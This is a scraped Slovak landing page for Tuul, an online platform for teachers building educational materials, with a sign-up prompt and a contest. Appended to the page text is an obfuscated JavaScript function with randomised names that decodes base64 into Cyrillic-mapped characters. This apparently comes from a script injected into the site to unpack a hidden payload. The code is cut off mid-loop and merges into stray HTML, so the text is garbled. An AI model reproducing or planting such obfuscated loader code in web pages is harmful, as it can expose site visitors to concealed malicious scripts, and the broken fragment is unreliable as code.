O Tuule

Tuul pomáha učiteľom, ktorí chcú vyučovať moderne a kvalitne. Práve tu vytvárajú online vzdelávacie materiály a používajú ich pri výučbe v škole i doma.
PRIDAJTE SA, ABY STE MOHLI:
Tvoriť

Spájajte rôzne zdroje z Internetu a tvorte Vaše online vzdelávacie materiály.

Vzdelávať

Materiály z Tuulu Vám poslúžia pri príprave do školy i na vyučovacej hodine.

BONUS NAVIAC:

Práve teraz môžete vyhrať atraktívne zájazdy vo Veľkej súťaži pre učiteľov.

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6t/" class="call-to-action"> PRIDAJTE SA